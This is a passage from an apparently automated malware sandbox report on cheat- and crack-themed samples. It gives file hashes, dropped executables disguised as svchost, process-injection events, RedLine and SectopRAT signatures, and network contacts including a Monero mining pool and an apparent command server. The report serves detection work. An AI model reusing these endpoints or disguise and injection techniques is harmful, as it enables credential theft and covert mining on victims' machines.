US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
CA 51.79.71.77:14444 xmr-us-east1.nanopool.org tcp
US 8.8.8.8:53 77.71.79.51.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/4444-0-0x0000000074852000-0x0000000074853000-memory.dmp

memory/4444-1-0x0000000074850000-0x0000000074E01000-memory.dmp

memory/4444-2-0x0000000074850000-0x0000000074E01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe

MD5 56a7502c31f7e8b9df6026cca035d000
SHA1 a2e1dea33bec675650559a148f78f831a0c11886
SHA256 b6dffd0fcf337c0da1439857c9bb162c1965641e644163f702f29bc84fd04b9f
SHA512 82b2331d087d0543ef5004d59206f618db7ad91225b4720b302c7da2263972cadebc8412a3fa85262c993bfab5247cfa4cfea01d80ea4cbeb59c0ef7fbebe499

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe

MD5 164b5610097d3c76850d0d3cc1f3892a
SHA1 31c439c5dab3c0a98ca827a07e17f903b8aae2f9
SHA256 e922d71f77061f2ce7100d4f1aea67b8477d7e9cd9e40a10a411868cf93bbc52
SHA512 fa832118802c3b4107911a541e8498a6c3acd1fba50c3e0a115899d521a77e293325397296d00353abd6d10965dc74b8fea1ee58dafa6547f05c76bd6e64450e

memory/4444-26-0x0000000074850000-0x0000000074E01000-memory.dmp

memory/4992-27-0x00007FF8ABE33000-0x00007FF8ABE35000-memory.dmp

memory/4992-25-0x0000000000E30000-0x0000000000E40000-memory.dmp

memory/1964-32-0x000001E37E590000-0x000001E37E5B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1ub5fzm.2nw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb1ad317bd25b55b2bbdce8a28a74a94
SHA1 98a3978be4d10d62e7411946474579ee5bdc5ea6
SHA256 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512 d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 22310ad6749d8cc38284aa616efcd100
SHA1 440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA256 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA512 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

MD5 a5bdb33481f19152370a4cbe486c1790
SHA1 d657448275485590e0b141bc3965f03650636e47
SHA256 ead94cc9778691b1388fc31b4a9ec1bb1220073508e80228bd85d325612d7075
SHA512 61612206312611b2026e8a38a4b1f18a24fb8605e75bd2fe26d4132a6a4ab890e4096d8eb96e5f2cfc312885451f156ef6e56bd00943e1745ad532bbfef3d0fe

memory/1844-79-0x0000000000AD0000-0x0000000000ADE000-memory.dmp

memory/1844-80-0x0000000001490000-0x00000000014A2000-memory.dmp

memory/1844-81-0x0000000001D00000-0x0000000001D0A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e69c5554cfe965e000e33ee9f1cd88d5
SHA1 ef74e8e9a0113870c87ece51d4e86040b1eeecdc
SHA256 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
SHA512 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cb0cf19ebeba3256a05065693a1ca866
SHA1 c028aff9b6850c2bdd6673b74037630b4ee2ccd8
SHA256 58e1183323526c135119df281171285d98b5ce05ad00f201ca899cd43358e3fb
SHA512 811606a0c8545eac53127a3687c6b0fde595dd7e958ef11ae650d142d40ac5e86ebbd313dc17dfa86c091ee868dc1c9ed422c2e541c6de3487e0c50c1a3e8fbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 83685d101174171875b4a603a6c2a35c
SHA1 37be24f7c4525e17fa18dbd004186be3a9209017
SHA256 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

MD5 23867f73ff39fa0dfee6cfb5d3d176ab
SHA1 8705a09d38e5f0b034a6f4b4deb5817e312204e1
SHA256 f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88
SHA512 108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 0dc0c432c76b5f23dec8f2da05da574f
SHA1 f93bb2cd4e300c5b7808c8aeb3d80797975ccfb0
SHA256 9d4ed1c19be402033e56523eb9a78a928102c689c82e27ab926ea6f2206e8fee
SHA512 5cc10e825cc53878e89b44e9ae01973c194955364992cd769aaac49ecf5af392b01f051e2fe800c617a391555aa385ea56a2ae4d565287c1a5e42af93f1812e9

memory/3304-160-0x0000000000500000-0x0000000000506000-memory.dmp

memory/4880-162-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-163-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-164-0x0000013745870000-0x0000013745890000-memory.dmp

memory/4880-166-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-168-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-167-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-165-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-169-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-170-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-172-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-175-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-173-0x0000000140000000-0x0000000140786000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

146s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2496 set thread context of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

Network

Country Destination Domain Proto
NL 185.92.73.140:80 185.92.73.140 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp

Files

memory/2496-0-0x00000000745EE000-0x00000000745EF000-memory.dmp

memory/2496-1-0x00000000013D0000-0x0000000001444000-memory.dmp

memory/2496-2-0x00000000745E0000-0x0000000074CCE000-memory.dmp

memory/2496-3-0x0000000000660000-0x0000000000682000-memory.dmp

memory/1588-4-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1588-9-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1588-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1588-10-0x00000000745E0000-0x0000000074CCE000-memory.dmp

memory/2496-11-0x00000000745E0000-0x0000000074CCE000-memory.dmp

memory/1588-12-0x00000000745E0000-0x0000000074CCE000-memory.dmp

memory/1588-13-0x00000000745E0000-0x0000000074CCE000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nixware crack.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\nixware crack.exe

"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 105.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A